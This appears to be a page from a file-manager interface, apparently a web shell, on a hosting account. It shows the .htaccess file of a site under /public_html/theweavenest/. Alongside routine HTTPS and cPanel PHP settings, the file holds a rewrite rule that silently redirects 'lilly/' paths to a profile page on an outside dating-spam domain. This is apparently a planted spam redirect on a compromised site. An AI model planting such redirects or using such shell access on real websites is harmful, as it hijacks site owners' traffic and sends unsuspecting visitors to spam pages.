/
home
/
sjslayjy
/
public_html
/
theweavenest
/
Upload File
HOME
#Force https start RewriteEngine On RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] #Force https stop RewriteEngine on RewriteRule lilly/(.+)$ https://lonelytastygirls.com/profile.php?id=$1&slog=lilly [R=301,L] # RewriteEngine on <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^(.*)$ public/$1 [L] </IfModule> # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php73” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php73 .php .php7 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit